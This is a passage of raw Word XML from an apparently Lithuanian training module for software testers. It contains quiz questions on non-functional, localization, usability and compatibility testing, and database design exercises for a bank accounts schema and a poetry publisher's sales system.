      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00795637" w:rsidRPr="00AD4464">
        <w:t>priskirtumėte funkciniam ar nefunkciniam testavimui</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>? Kodėl?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412A40" w:rsidRPr="00AD4464" w:rsidRDefault="00412A40" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>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490670" w:rsidRPr="00AD4464" w:rsidTr="00CD3665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00490670"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490670" w:rsidRPr="00AD4464" w:rsidRDefault="00490670" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D53040" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kas yra atsakingas už nefunkcinių reikalavimų atitikimą k</w:t>
      </w:r>
      <w:r w:rsidR="002D59EF" w:rsidRPr="00AD4464">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>riant program</w:t>
      </w:r>
      <w:r w:rsidR="002D59EF" w:rsidRPr="00AD4464">
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D53040" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Programuotojai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D53040" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuotojai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D53040" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Devops</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B950DC" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:r w:rsidR="00D53040" w:rsidRPr="00AD4464">
        <w:t>nžinieriai</w:t>
      </w:r>
      <w:r w:rsidR="000B6F6B" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="000B6F6B" w:rsidRPr="00AD4464">
        <w:t>inkle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00FA1882" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kas yra lokalizacijos testavimas?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00FC3E56" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00EE45CB" w:rsidRPr="00AD4464">
        <w:t>ai Sistema tikrinama ar</w:t>
      </w:r>
      <w:r w:rsidR="00BB0174" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> tinkamai palaiko kelias kalbas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00FC3E56" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00EE45CB" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">ai Sistema yra tikrinama ar teisingai verčiamas jos </w:t>
      </w:r>
      <w:r w:rsidR="00BB0174" w:rsidRPr="00AD4464">
        <w:t>turinys į kitą kalbą dinamiškai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00FC3E56" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00EE45CB" w:rsidRPr="00AD4464">
        <w:t>ai tikrinama, ar Sistema tinkamai prisitaiko prie regiono, laiko juostų pokyčių ir atitinkamai pritaiko specifinius jo</w:t>
      </w:r>
      <w:r w:rsidR="00BB0174" w:rsidRPr="00AD4464">
        <w:t>s komponentus bei verčia turinį</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00FC3E56" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00EE45CB" w:rsidRPr="00AD4464">
        <w:t>ai tikrinama, ar Sistema geba atpažinti šalį bei atitinka</w:t>
      </w:r>
      <w:r w:rsidR="00BB0174" w:rsidRPr="00AD4464">
        <w:t>mai pritaikyti turinio vertimus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00EE45CB" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kaip gali</w:t>
      </w:r>
      <w:r w:rsidR="00D05A97" w:rsidRPr="00AD4464">
        <w:t>me apibūdinti sistemos panaudojamumą?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450321" w:rsidRPr="00AD4464" w:rsidRDefault="00450321" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>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D05A97" w:rsidRPr="00AD4464" w:rsidTr="00CD3665">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00D05A97" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atsakymas:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D05A97" w:rsidRPr="00AD4464" w:rsidRDefault="00D05A97" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D05A97" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Panaudojamumas – tai naudotojo veiklos veiksmingumas, našumas ir jaučiamas pasitenkinimas, su kuriuo konkretus naudotojas gali pasiekti konkrečių tikslų konkrečiose aplinkose, šiuo atveju, naudodamasis mūsų sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D40C3F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kas yra suderinamumo testavimas?</w:t>
      </w:r>
      <w:r w:rsidR="00905D76" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> Pasirinkite geriausiai tinkantį</w:t>
      </w:r>
      <w:r w:rsidR="00EA7D9B" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> apibūdinimą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D40C3F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Ar k</w:t>
      </w:r>
      <w:r w:rsidR="002D59EF" w:rsidRPr="00AD4464">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>riama programa yra suderinama su duomenų baze, operacine Sistema, kita programine bei tec</w:t>
      </w:r>
      <w:r w:rsidR="00BB0174" w:rsidRPr="00AD4464">
        <w:t>hnine įranga</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D40C3F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Ar k</w:t>
      </w:r>
      <w:r w:rsidR="002D59EF" w:rsidRPr="00AD4464">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">riama programa gali dirbi </w:t>
      </w:r>
      <w:r w:rsidR="00EA7D9B" w:rsidRPr="00AD4464">
        <w:t>sinchronizuotai su keli</w:t>
      </w:r>
      <w:r w:rsidR="00BB0174" w:rsidRPr="00AD4464">
        <w:t>omis duomenų bazėmis vienu metu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004B0E92" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Ar </w:t>
      </w:r>
      <w:r w:rsidR="00446194" w:rsidRPr="00AD4464">
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="002D59EF" w:rsidRPr="00AD4464">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00446194" w:rsidRPr="00AD4464">
        <w:t>riama programa</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> gali pilnavertiškai veikti tiek su Windows, tiek s</w:t>
      </w:r>
      <w:r w:rsidR="00BB0174" w:rsidRPr="00AD4464">
        <w:t>u Linux operacinėmis sistemomis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00DA5383" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00446194" w:rsidRPr="00AD4464">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00446194" w:rsidRPr="00AD4464">
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="002D59EF" w:rsidRPr="00AD4464">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00446194" w:rsidRPr="00AD4464">
        <w:t>riama programa</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> nelūžta</w:t>
      </w:r>
      <w:r w:rsidR="00BB0174" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> po atnaujinimo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc10443970"/>
      <w:bookmarkStart w:id="137" w:name="_Toc13095519"/>
      <w:bookmarkStart w:id="138" w:name="_Toc13833413"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:kern w:val="36"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="139" w:name="_Toc14392444"/>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „N</w:t>
      </w:r>
      <w:r w:rsidR="004E3964" w:rsidRPr="004E3964">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>esudėtingų duomenų bazių projektavimas ir kūrimas</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (programinės įrangos testuotojo)</w:t>
      </w:r>
      <w:r w:rsidR="004E3964" w:rsidRPr="004E3964">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
      <w:bookmarkEnd w:id="137"/>
      <w:bookmarkEnd w:id="138"/>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:bookmarkStart w:id="140" w:name="_Toc10443971"/>
      <w:bookmarkStart w:id="141" w:name="_Toc13095520"/>
      <w:bookmarkStart w:id="142" w:name="_Toc13833414"/>
      <w:bookmarkStart w:id="143" w:name="_Toc14392445"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Kompetencija. Projektuoti tipines reliacines ir nereliacines </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">(NoSQL)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>duomenų bazes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
      <w:bookmarkEnd w:id="141"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
      <w:bookmarkEnd w:id="143"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_Toc10443972"/>
      <w:bookmarkStart w:id="145" w:name="_Toc13095521"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="146" w:name="_Toc13833415"/>
      <w:bookmarkStart w:id="147" w:name="_Toc14392446"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Pateikti reliacinės duomenų bazės schemą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
      <w:bookmarkEnd w:id="145"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
      <w:bookmarkEnd w:id="147"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. SUPROJEKTUOTI RELIACINĘ DUOMENŲ BAZĘ (ATVEJIS: LIETUVOS BANKAS)</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Lietuvos bankas paprašo jūsų padaryti jiems DB. Jie nori, kad toje DB būtų sudėti duomenys apie visus Lietuvos žmones (jų asmens kodas, vardas, pavardė, telefono numeris), tam, kad jie galėtų išsiaiškinti, kokiuose bankuose jie turi sąskaitas ir koks jų pinigų balansas-likutis jose yra. Suprojektuokite tokią duomenų bazę, atitinkančią 3 normalinės formos reikalavimus. Projekte turi būti nurodyti pirminiai ir antriniai raktai, ryšiai tarp lentelių ir jų tipai. (P.S. ne mažiau 3 lentelės). Kontrolinis klausimas: kuriuose bankuose Petro balansas didesnis už 1000?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. SUPROJEKTUOTI RELIACINĘ DUOMENŲ BAZĘ (ATVEJIS: LEIDYBOS STEBĖJIMO SISTEMA)</w:t>
      </w:r>
      <w:r w:rsidR="004E3964">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>„Poezijos būrelis“ – tai leidykla, leidžianti poeziją ir poezijos rinkinius. Reikalinga sistema, kurioje būtų galima registruoti poetus, eilėraščius, jų rinkinius ir pardavimą.</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Poetu gali būti visi norintieji, ne vien tik užfiksavę savo poeziją sistemoje arba jau sukūrė poezijos kūrinį.</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Poezijos kūrinius galima pateikti internetu, el. paštu arba popieriuje.</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Visi sistemoje užfiksuoti poezijos kūriniai parašyti poetų, kurių duomenys jau užfiksuoti sistemoje. Nepateikęs visos reikalaujamos informacijos, poetas negalės pateikti ir išsaugoti savo poezijos sistemoje.</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Leidinį gali sudaryti ir vienas eilėraštis, ir poezijos rinkinys, ir literatūros kritikos kūrinys.</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Leidiniai parduodami klientams, apie kuriuos sistemoje yra informacijos. Anonimiški pirkėjai neaptarnaujami.</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Vieno pardavimo metu galima parduoti ir vieną leidinį, ir kelis. Tačiau jei parduodama keliems klientams, leidykla tai traktuoja kaip pardavimą kelis kartus. Kiekvienas klientas aptarnaujamas atskirai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
